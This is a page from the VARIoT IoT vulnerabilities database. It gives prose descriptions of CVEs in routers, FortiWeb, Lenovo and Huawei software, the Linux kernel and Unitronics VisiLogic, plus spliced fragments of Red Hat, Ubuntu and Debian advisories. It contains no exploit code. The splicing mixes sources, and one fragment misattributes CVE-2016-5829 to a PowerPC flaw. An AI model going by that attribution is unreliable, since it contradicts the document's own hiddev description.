VARIoT IoT vulnerabilities database

Cross-site request forgery (CSRF) vulnerability on NTT EAST Hikari Denwa routers with firmware PR-400MI, RT-400MI, and RV-440MI 07.00.1006 and earlier and NTT WEST Hikari Denwa routers with firmware PR-400MI, RT-400MI, and RV-440MI 07.00.1005 and earlier allows remote attackers to hijack the authentication of arbitrary users. Ryoya Tsukasaki of Urawa Commercial High School reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.If a user views a malicious page while logged in, unintended operations may be performed. NTTHikariDenwaPR-400MI, RV-440MI and RT-400MI are all router products of Japan Telecom Telephone (NTT). An attacker could exploit the vulnerability to perform unauthorized actions. This may aid in other attacks. The following products and versions are affected: NTT Hikari Denwa PR-400MI, RV-440MI, RT-400MI using firmware version 07.00.1006 and earlier, Hikari Denwa PR-400MI, RV-440MI, RT using firmware version 07.00.1005 and earlier -400MI

Cross-site request forgery (CSRF) vulnerability in Fortinet FortiWeb before 5.5.3 allows remote attackers to hijack the authentication of administrators for requests that change the password via unspecified vectors. Fortinet FortiWeb is prone to a cross-site request-forgery vulnerability because it does not properly validate HTTP requests. Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks. Versions of Fortinet FortiWeb prior to 5.5.3 are vulnerable. Fortinet FortiWeb is a web application layer firewall developed by Fortinet, which can block threats such as cross-site scripting, SQL injection, cookie poisoning, schema poisoning, etc., to ensure the security of web applications and protect sensitive database content

Lenovo Solution Center (LSC) before 3.3.003 allows local users to execute arbitrary code with LocalSystem privileges via vectors involving the LSC.Services.SystemService StartProxy command with a named pipe created in advance and crafted .NET assembly. Lenovo Solution Center is prone to local privilege-escalation and arbitrary code-execution vulnerabilities. Lenovo Solution Center 3.3.002 and prior versions are vulnerable. Lenovo Solution Center (LSC) is a set of software developed by China Lenovo (Lenovo) to help users quickly identify system health status, network connection and overall system security status. Arbitrary code execution vulnerabilities exist in versions prior to LSC 3.3.003

The StopProxy command in LSC.Services.SystemService in Lenovo Solution Center before 3.3.003 allows local users to terminate arbitrary processes via the PID argument. A local attacker can exploit this issue to execute arbitrary code with LocalSystem account privileges. Lenovo Solution Center 3.3.002 and prior versions are vulnerable. Lenovo Solution Center (LSC) is a set of software developed by China Lenovo (Lenovo) to help users quickly identify system health status, network connection and overall system security status. A local privilege escalation vulnerability exists in the StopProxy command in LSC.Services.SystemService of versions prior to LSC 3.3.003

Multiple heap-based buffer overflows in the hiddev_ioctl_usage function in drivers/hid/usbhid/hiddev.c in the Linux kernel through 4.6.3 allow local users to cause a denial of service or possibly have unspecified other impact via a crafted (1) HIDIOCGUSAGES or (2) HIDIOCSUSAGES ioctl call. The Linux kernel is prone to a local heap-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. Local attackers may exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will likely crash the kernel, denying service to legitimate users. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Important: kernel security and bug fix update Advisory ID: RHSA-2016:2006-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-2006.html Issue date: 2016-10-04 CVE Names: CVE-2016-4470 CVE-2016-5829 ===================================================================== 1. Summary: An update for kernel is now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Desktop (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - noarch, x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, noarch, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64 3. Description: The kernel packages contain the Linux kernel, the core of any Linux operating system. Security Fix(es): * A flaw was found in the Linux kernel's keyring handling code, where in key_reject_and_link() an uninitialized variable would eventually lead to arbitrary free address which could allow attacker to use a use-after-free style attack. (CVE-2016-4470, Important) * A heap-based buffer overflow vulnerability was found in the Linux kernel's hiddev driver. This flaw could allow a local attacker to corrupt kernel memory, possible privilege escalation or crashing the system. (CVE-2016-5829, Moderate) The CVE-2016-4470 issue was discovered by David Howells (Red Hat Inc.). Bug Fix(es): * Previously, when two NFS shares with different security settings were mounted, the I/O operations to the kerberos-authenticated mount caused the RPC_CRED_KEY_EXPIRE_SOON parameter to be set, but the parameter was not unset when performing the I/O operations on the sec=sys mount. Consequently, writes to both NFS shares had the same parameters, regardless of their security settings. This update fixes this problem by moving the NO_CRKEY_TIMEOUT parameter to the auth->au_flags field. As a result, NFS shares with different security settings are now handled as expected. (BZ#1366962) * In some circumstances, resetting a Fibre Channel over Ethernet (FCoE) interface could lead to a kernel panic, due to invalid information extracted from the FCoE header. This update adds santiy checking to the cpu number extracted from the FCoE header. This ensures that subsequent operations address a valid cpu, and eliminates the kernel panic. (BZ#1359036) * Prior to this update, the following problems occurred with the way GSF2 transitioned files and directories from the "unlinked" state to the "free" state: The numbers reported for the df and the du commands in some cases got out of sync, which caused blocks in the file system to appear missing. The blocks were not actually missing, but they were left in the "unlinked" state. In some circumstances, GFS2 referenced a cluster lock that was already deleted, which led to a kernel panic. If an object was deleted and its space reused as a different object, GFS2 sometimes deleted the existing one, which caused file system corruption. With this update, the transition from "unlinked" to "free" state has been fixed. As a result, none of these three problems occur anymore. (BZ#1359037) * Previously, the GFS2 file system in some cases became unresponsive due to lock dependency problems between inodes and the cluster lock. This occurred most frequently on nearly full file systems where files and directories were being deleted and recreated at the same block location at the same time. With this update, a set of patches has been applied to fix these lock dependencies. As a result, GFS2 no longer hangs in the described circumstances. (BZ#1359038) * When used with controllers that do not support DCMD- MR_DCMD_PD_LIST_QUERY, the megaraid_sas driver can go into infinite error reporting loop of error reporting messages. This could cause difficulties with finding other important log messages, or even it could cause the disk to overflow. This bug has been fixed by ignoring the DCMD MR_DCMD_PD_LIST_QUERY query for controllers which do not support it and sending the DCMD SUCCESS status to the AEN functions. As a result, the error messages no longer appear when there is a change in the status of one of the arrays. (BZ#1359039) 4. Solution: For details on how to apply this update, which includes the changes described in this advisory, refer to: https://access.redhat.com/articles/11258 The system must be rebooted for this update to take effect. 5. Bugs fixed (https://bugzilla.redhat.com/): 1341716 - CVE-2016-4470 kernel: Uninitialized variable in request_key handling causes kernel crash in error handling path 1350509 - CVE-2016-5829 kernel: Heap buffer overflow in hiddev driver 6. Package List: Red Hat Enterprise Linux Desktop (v. 6): Source: kernel-2.6.32-642.6.1.el6.src.rpm i386: kernel-2.6.32-642.6.1.el6.i686.rpm kernel-debug-2.6.32-642.6.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-642.6.1.el6.i686.rpm kernel-debug-devel-2.6.32-642.6.1.el6.i686.rpm kernel-debuginfo-2.6.32-642.6.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-642.6.1.el6.i686.rpm kernel-devel-2.6.32-642.6.1.el6.i686.rpm kernel-headers-2.6.32-642.6.1.el6.i686.rpm perf-2.6.32-642.6.1.el6.i686.rpm perf-debuginfo-2.6.32-642.6.1.el6.i686.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.i686.rpm noarch: kernel-abi-whitelists-2.6.32-642.6.1.el6.noarch.rpm kernel-doc-2.6.32-642.6.1.el6.noarch.rpm kernel-firmware-2.6.32-642.6.1.el6.noarch.rpm x86_64: kernel-2.6.32-642.6.1.el6.x86_64.rpm kernel-debug-2.6.32-642.6.1.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-642.6.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm kernel-debug-devel-2.6.32-642.6.1.el6.i686.rpm kernel-debug-devel-2.6.32-642.6.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-642.6.1.el6.i686.rpm kernel-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-642.6.1.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-642.6.1.el6.x86_64.rpm kernel-devel-2.6.32-642.6.1.el6.x86_64.rpm kernel-headers-2.6.32-642.6.1.el6.x86_64.rpm perf-2.6.32-642.6.1.el6.x86_64.rpm perf-debuginfo-2.6.32-642.6.1.el6.i686.rpm perf-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.i686.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm Red Hat Enterprise Linux Desktop Optional (v. 6): i386: kernel-debug-debuginfo-2.6.32-642.6.1.el6.i686.rpm kernel-debuginfo-2.6.32-642.6.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-642.6.1.el6.i686.rpm perf-debuginfo-2.6.32-642.6.1.el6.i686.rpm python-perf-2.6.32-642.6.1.el6.i686.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.i686.rpm x86_64: kernel-debug-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-642.6.1.el6.x86_64.rpm perf-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm python-perf-2.6.32-642.6.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm Red Hat Enterprise Linux HPC Node (v. 6): Source: kernel-2.6.32-642.6.1.el6.src.rpm noarch: kernel-abi-whitelists-2.6.32-642.6.1.el6.noarch.rpm kernel-doc-2.6.32-642.6.1.el6.noarch.rpm kernel-firmware-2.6.32-642.6.1.el6.noarch.rpm x86_64: kernel-2.6.32-642.6.1.el6.x86_64.rpm kernel-debug-2.6.32-642.6.1.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-642.6.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm kernel-debug-devel-2.6.32-642.6.1.el6.i686.rpm kernel-debug-devel-2.6.32-642.6.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-642.6.1.el6.i686.rpm kernel-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-642.6.1.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-642.6.1.el6.x86_64.rpm kernel-devel-2.6.32-642.6.1.el6.x86_64.rpm kernel-headers-2.6.32-642.6.1.el6.x86_64.rpm perf-2.6.32-642.6.1.el6.x86_64.rpm perf-debuginfo-2.6.32-642.6.1.el6.i686.rpm perf-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.i686.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm Red Hat Enterprise Linux HPC Node Optional (v. 6): x86_64: kernel-debug-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-642.6.1.el6.x86_64.rpm perf-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm python-perf-2.6.32-642.6.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm Red Hat Enterprise Linux Server (v. 6): Source: kernel-2.6.32-642.6.1.el6.src.rpm i386: kernel-2.6.32-642.6.1.el6.i686.rpm kernel-debug-2.6.32-642.6.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-642.6.1.el6.i686.rpm kernel-debug-devel-2.6.32-642.6.1.el6.i686.rpm kernel-debuginfo-2.6.32-642.6.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-642.6.1.el6.i686.rpm kernel-devel-2.6.32-642.6.1.el6.i686.rpm kernel-headers-2.6.32-642.6.1.el6.i686.rpm perf-2.6.32-642.6.1.el6.i686.rpm perf-debuginfo-2.6.32-642.6.1.el6.i686.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.i686.rpm noarch: kernel-abi-whitelists-2.6.32-642.6.1.el6.noarch.rpm kernel-doc-2.6.32-642.6.1.el6.noarch.rpm kernel-firmware-2.6.32-642.6.1.el6.noarch.rpm ppc64: kernel-2.6.32-642.6.1.el6.ppc64.rpm kernel-bootwrapper-2.6.32-642.6.1.el6.ppc64.rpm kernel-debug-2.6.32-642.6.1.el6.ppc64.rpm kernel-debug-debuginfo-2.6.32-642.6.1.el6.ppc64.rpm kernel-debug-devel-2.6.32-642.6.1.el6.ppc64.rpm kernel-debuginfo-2.6.32-642.6.1.el6.ppc64.rpm kernel-debuginfo-common-ppc64-2.6.32-642.6.1.el6.ppc64.rpm kernel-devel-2.6.32-642.6.1.el6.ppc64.rpm kernel-headers-2.6.32-642.6.1.el6.ppc64.rpm perf-2.6.32-642.6.1.el6.ppc64.rpm perf-debuginfo-2.6.32-642.6.1.el6.ppc64.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.ppc64.rpm s390x: kernel-2.6.32-642.6.1.el6.s390x.rpm kernel-debug-2.6.32-642.6.1.el6.s390x.rpm kernel-debug-debuginfo-2.6.32-642.6.1.el6.s390x.rpm kernel-debug-devel-2.6.32-642.6.1.el6.s390x.rpm kernel-debuginfo-2.6.32-642.6.1.el6.s390x.rpm kernel-debuginfo-common-s390x-2.6.32-642.6.1.el6.s390x.rpm kernel-devel-2.6.32-642.6.1.el6.s390x.rpm kernel-headers-2.6.32-642.6.1.el6.s390x.rpm kernel-kdump-2.6.32-642.6.1.el6.s390x.rpm kernel-kdump-debuginfo-2.6.32-642.6.1.el6.s390x.rpm kernel-kdump-devel-2.6.32-642.6.1.el6.s390x.rpm perf-2.6.32-642.6.1.el6.s390x.rpm perf-debuginfo-2.6.32-642.6.1.el6.s390x.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.s390x.rpm x86_64: kernel-2.6.32-642.6.1.el6.x86_64.rpm kernel-debug-2.6.32-642.6.1.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-642.6.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm kernel-debug-devel-2.6.32-642.6.1.el6.i686.rpm kernel-debug-devel-2.6.32-642.6.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-642.6.1.el6.i686.rpm kernel-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-642.6.1.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-642.6.1.el6.x86_64.rpm kernel-devel-2.6.32-642.6.1.el6.x86_64.rpm kernel-headers-2.6.32-642.6.1.el6.x86_64.rpm perf-2.6.32-642.6.1.el6.x86_64.rpm perf-debuginfo-2.6.32-642.6.1.el6.i686.rpm perf-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.i686.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm Red Hat Enterprise Linux Server Optional (v. 6): i386: kernel-debug-debuginfo-2.6.32-642.6.1.el6.i686.rpm kernel-debuginfo-2.6.32-642.6.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-642.6.1.el6.i686.rpm perf-debuginfo-2.6.32-642.6.1.el6.i686.rpm python-perf-2.6.32-642.6.1.el6.i686.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.i686.rpm ppc64: kernel-debug-debuginfo-2.6.32-642.6.1.el6.ppc64.rpm kernel-debuginfo-2.6.32-642.6.1.el6.ppc64.rpm kernel-debuginfo-common-ppc64-2.6.32-642.6.1.el6.ppc64.rpm perf-debuginfo-2.6.32-642.6.1.el6.ppc64.rpm python-perf-2.6.32-642.6.1.el6.ppc64.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.ppc64.rpm s390x: kernel-debug-debuginfo-2.6.32-642.6.1.el6.s390x.rpm kernel-debuginfo-2.6.32-642.6.1.el6.s390x.rpm kernel-debuginfo-common-s390x-2.6.32-642.6.1.el6.s390x.rpm kernel-kdump-debuginfo-2.6.32-642.6.1.el6.s390x.rpm perf-debuginfo-2.6.32-642.6.1.el6.s390x.rpm python-perf-2.6.32-642.6.1.el6.s390x.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.s390x.rpm x86_64: kernel-debug-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-642.6.1.el6.x86_64.rpm perf-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm python-perf-2.6.32-642.6.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm Red Hat Enterprise Linux Workstation (v. 6): Source: kernel-2.6.32-642.6.1.el6.src.rpm i386: kernel-2.6.32-642.6.1.el6.i686.rpm kernel-debug-2.6.32-642.6.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-642.6.1.el6.i686.rpm kernel-debug-devel-2.6.32-642.6.1.el6.i686.rpm kernel-debuginfo-2.6.32-642.6.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-642.6.1.el6.i686.rpm kernel-devel-2.6.32-642.6.1.el6.i686.rpm kernel-headers-2.6.32-642.6.1.el6.i686.rpm perf-2.6.32-642.6.1.el6.i686.rpm perf-debuginfo-2.6.32-642.6.1.el6.i686.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.i686.rpm noarch: kernel-abi-whitelists-2.6.32-642.6.1.el6.noarch.rpm kernel-doc-2.6.32-642.6.1.el6.noarch.rpm kernel-firmware-2.6.32-642.6.1.el6.noarch.rpm x86_64: kernel-2.6.32-642.6.1.el6.x86_64.rpm kernel-debug-2.6.32-642.6.1.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-642.6.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm kernel-debug-devel-2.6.32-642.6.1.el6.i686.rpm kernel-debug-devel-2.6.32-642.6.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-642.6.1.el6.i686.rpm kernel-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-642.6.1.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-642.6.1.el6.x86_64.rpm kernel-devel-2.6.32-642.6.1.el6.x86_64.rpm kernel-headers-2.6.32-642.6.1.el6.x86_64.rpm perf-2.6.32-642.6.1.el6.x86_64.rpm perf-debuginfo-2.6.32-642.6.1.el6.i686.rpm perf-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.i686.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm Red Hat Enterprise Linux Workstation Optional (v. 6): i386: kernel-debug-debuginfo-2.6.32-642.6.1.el6.i686.rpm kernel-debuginfo-2.6.32-642.6.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-642.6.1.el6.i686.rpm perf-debuginfo-2.6.32-642.6.1.el6.i686.rpm python-perf-2.6.32-642.6.1.el6.i686.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.i686.rpm x86_64: kernel-debug-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-642.6.1.el6.x86_64.rpm perf-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm python-perf-2.6.32-642.6.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/ 7. References: https://access.redhat.com/security/cve/CVE-2016-4470 https://access.redhat.com/security/cve/CVE-2016-5829 https://access.redhat.com/security/updates/classification/#important 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iD8DBQFX9CKhXlSAg2UNWIIRAtDIAJ4jq1XKyOvhk936eIn8YqaTfkJ9PQCdEyBk pvpRQNlcn7vpNO2lmcMjswg= =1otA -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . 7) - noarch, x86_64 3. Description: The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. A local user could exploit this flaw to gain access to any file by setting an ACL. (CVE-2016-1237) Kangjie Lu discovered an information leak in the Reliable Datagram Sockets (RDS) implementation in the Linux kernel. (CVE-2016-5244) James Patrick-Evans discovered that the airspy USB device driver in the Linux kernel did not properly handle certain error conditions. (CVE-2016-5400) Yue Cao et al discovered a flaw in the TCP implementation's handling of challenge acks in the Linux kernel. A remote attacker could use this to cause a denial of service (reset connection) or inject content into an TCP stream. (CVE-2016-5696) Pengfei Wang discovered a race condition in the MIC VOP driver in the Linux kernel. (CVE-2016-5728) Cyril Bur discovered that on PowerPC platforms, the Linux kernel mishandled transactional memory state on exec(). (CVE-2016-5829) It was discovered that the OverlayFS implementation in the Linux kernel did not properly verify dentry state before proceeding with unlink and rename operations. (CVE-2016-6197) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 16.04 LTS: linux-image-4.4.0-36-generic 4.4.0-36.55 linux-image-4.4.0-36-generic-lpae 4.4.0-36.55 linux-image-4.4.0-36-lowlatency 4.4.0-36.55 linux-image-4.4.0-36-powerpc-e500mc 4.4.0-36.55 linux-image-4.4.0-36-powerpc-smp 4.4.0-36.55 linux-image-4.4.0-36-powerpc64-emb 4.4.0-36.55 linux-image-4.4.0-36-powerpc64-smp 4.4.0-36.55 After a standard system update you need to reboot your computer to make all the necessary changes. ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well. CVE-2016-6130 Pengfei Wang discovered a flaw in the S/390 character device drivers potentially leading to information leak with /dev/sclp. For the stable distribution (jessie), these problems have been fixed in version 3.16.7-ckt25-2+deb8u3. Security Fix(es): * It was found that the Linux kernel's IPv6 implementation mishandled socket options. A local attacker could abuse concurrent access to the socket options to escalate their privileges, or cause a denial of service (use-after-free and system crash) via a crafted sendmsg system call. Space precludes documenting each of these issues in this advisory. Refer to the CVE links in the References section for a description of each of these vulnerabilities. (CVE-2013-4312, CVE-2015-8374, CVE-2015-8543, CVE-2015-8812, CVE-2015-8844, CVE-2015-8845, CVE-2016-2053, CVE-2016-2069, CVE-2016-2847, CVE-2016-3156, CVE-2016-4581, CVE-2016-4794, CVE-2016-5412, CVE-2016-5828, CVE-2016-5829, CVE-2016-6136, CVE-2016-6198, CVE-2016-6327, CVE-2016-6480, CVE-2015-8746, CVE-2015-8956, CVE-2016-2117, CVE-2016-2384, CVE-2016-3070, CVE-2016-3699, CVE-2016-4569, CVE-2016-4578) Red Hat would like to thank Philip Pettersson (Samsung) for reporting CVE-2016-2053; Tetsuo Handa for reporting CVE-2016-2847; the Virtuozzo kernel team and Solar Designer (Openwall) for reporting CVE-2016-3156; Justin Yackoski (Cryptonite) for reporting CVE-2016-2117; and Linn Crosetto (HP) for reporting CVE-2016-3699. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 7.3 Release Notes linked from the References section. Bugs fixed (https://bugzilla.redhat.com/): 1141249 - Xen guests may hang after migration or suspend/resume 1234586 - Backtrace after unclean shutdown with XFS v5 and project quotas 1267042 - XFS needs to better handle EIO and ENOSPC 1277863 - Test case failure: Screen - Resolution after no Screen Boot on Intel Valley View Gen7 [8086:0f31] 1278224 - panic in iscsi_target.c 1283341 - cannot mount RHEL7 NFS server with nfsvers=4.1,sec=krb5 but nfsvers=4.0,sec=krb5 works 1286261 - CVE-2015-8374 kernel: Information leak when truncating of compressed/inlined extents on BTRFS 1286500 - Tool thin_dump failing to show 'mappings' 1290475 - CVE-2015-8543 kernel: IPv6 connect causes DoS via NULL pointer dereference 1292481 - device mapper hung tasks on an openshift/docker system 1295802 - CVE-2015-8746 kernel: when NFSv4 migration is executed, kernel oops occurs at NFS client 1297813 - CVE-2013-4312 kernel: File descriptors passed over unix sockets are not properly accounted 1299662 - VFIO: include no-IOMMU mode - not supported 1300023 - soft lockup in nfs4_put_stid with 3.10.0-327.4.4.el7 1300237 - CVE-2016-2053 kernel: Kernel panic and system lockup by triggering BUG_ON() in public_key_verify_signature() 1301893 - CVE-2016-2069 kernel: race condition in the TLB flush logic 1302166 - MAC address of VF is not editable even when attached to host 1303532 - CVE-2015-8812 kernel: CXGB3: Logic bug in return code handling prematurely frees key structures causing Use after free or kernel panic. 1305118 - XFS support for deferred dio completion 1307091 - fstrim failing on mdadm raid 5 device 1308444 - CVE-2016-2384 kernel: double-free in usb-audio triggered by invalid USB descriptor 1308846 - CVE-2016-3070 kernel: Null pointer dereference in trace_writeback_dirty_page() 1312298 - CVE-2016-2117 kernel: Kernel memory leakage to ethernet frames due to buffer overflow in ethernet drivers 1313428 - CVE-2016-2847 kernel: pipe: limit the per-user amount of pages allocated in pipes 1318172 - CVE-2016-3156 kernel: ipv4: denial of service when destroying a network interface 1321096 - BUG: s390 socketcall() syscalls audited with wrong value in field a0 1326540 - CVE-2015-8845 CVE-2015-8844 kernel: incorrect restoration of machine specific registers from userspace 1329653 - CVE-2016-3699 kernel: ACPI table override allowed when securelevel is enabled 1333712 - CVE-2016-4581 kernel: Slave being first propagated copy causes oops in propagate_mnt 1334643 - CVE-2016-4569 kernel: Information leak in Linux sound module in timer.c 1335215 - CVE-2016-4578 kernel: Information leak in events in timer.c 1335889 - CVE-2016-4794 kernel: Use after free in array_map_alloc 1349539 - T460[p/s] audio output on dock won't work 1349916 - CVE-2016-5412 Kernel: powerpc: kvm: Infinite loop via H_CEDE hypercall when running under hypervisor-mode 1349917 - CVE-2016-5828 Kernel: powerpc: tm: crash via exec system call on PPC 1350509 - CVE-2016-5829 kernel: Heap buffer overflow in hiddev driver 1353533 - CVE-2016-6136 kernel: Race condition vulnerability in execve argv arguments 1354525 - CVE-2016-6327 kernel: infiniband: Kernel crash by sending ABORT_TASK command 1355654 - CVE-2016-6198 kernel: vfs: missing detection of hardlinks in vfs_rename() on overlayfs 1361245 - [Hyper-V][RHEL 7.2] VMs panic when configured with Dynamic Memory as opposed to Static Memory 1362466 - CVE-2016-6480 kernel: scsi: aacraid: double fetch in ioctl_send_fib() 1364971 - CVE-2016-3841 kernel: use-after-free via crafted IPV6 sendmsg for raw / tcp / udp / l2tp sockets. 1383395 - CVE-2015-8956 kernel: NULL dereference in RFCOMM bind callback 6

Huawei OceanStor 5300 V3, 5500 V3, 5600 V3, 5800 V3, 6800 V3, 18800 V3, and 18500 V3 before V300R003C10 sends the plaintext session token in the HTTP header, which allows remote attackers to conduct replay attacks and obtain sensitive information by sniffing the network. OceanStor Is HTTP Replay attack to send clear session token in header ( Replay attack ) There are vulnerabilities that can be executed and get important information.A replay attack by intercepting the network by a third party ( Replay attack ) May be executed and important information may be obtained. Huawei OceanStor 5300 and other storage products are all Huawei's Huawei products. A security vulnerability exists in several HuaweiOceanStor products. The vulnerability stems from the fact that the program sends a clear text session token in the HTTP header. A remote attacker can exploit the vulnerability by sniffing the network to implement replay attacks and obtain sensitive information. This may lead to other attacks. The following products and versions are affected: Huawei OceanStor 5300 V3, 5500 V3, 5600 V3, 5800 V3, 6800 V3, 18800 V3, and V3 versions earlier than 18500 V300R003C10

ASUS DSL-N55U is a dual-band wireless router product from ASUS. Cross-site scripting vulnerabilities and information disclosure vulnerabilities exist in ASUS DSL-N55U Router 3.0.0.4.376_2736. These vulnerabilities originate from programs that do not properly filter input submitted by users. When a user browses an affected website, their browser executes arbitrary script code provided by the attacker. This could lead to attackers stealing cookie-based authentication and gaining sensitive information. ASUS DSL-N55U 3.0.0.4.376_2736 is vulnerable

Huawei HiSuite before 4.0.4.204_ove (Out of China) and before 4.0.4.301 (China) use a weak ACL (FILE_WRITE_DATA for BUILTIN\Users) for the HiSuite service directory, which allows local users to gain SYSTEM privileges via a Trojan horse (1) SspiCli.dll or (2) USERENV.dll file or possibly other unspecified DLL files. Huawei UTPS is prone to a local code-execution vulnerability. A local attacker can leverage this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will result in a denial of service condition. Huawei HiSuite 4.0.3.301 and prior are vulnerable. Huawei HiSuite versions prior to 4.0.4.204_ove (Out of China) and versions prior to 4.0.4.301 (China) have a privilege escalation vulnerability. The vulnerability stems from the program using a weak ACL (FILE_WRITE_DATA for BUILTIN\Users) for the HiSuite service directory

Stack-based buffer overflow in Unitronics VisiLogic OPLC IDE before 9.8.30 allows remote attackers to execute arbitrary code via a crafted filename field in a ZIP archive in a vlp file. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within parsing of a vlp file, which uses the zip file format. The software fails to validate the length of the filename field within the file before copying it to a stack buffer. This vulnerability can be leveraged by an attacker to achieve code execution within the context of the process. Unitronics VisiLogic OPLC IDE is a set of human machine interface (HMI) and PLC application programming environments for Vision and SAMBA series controllers from Unitronics, Israel. Unitronics VisiLogic is prone to a stack-based buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. Failed exploit attempts will likely cause a denial-of-service condition. Versions prior to 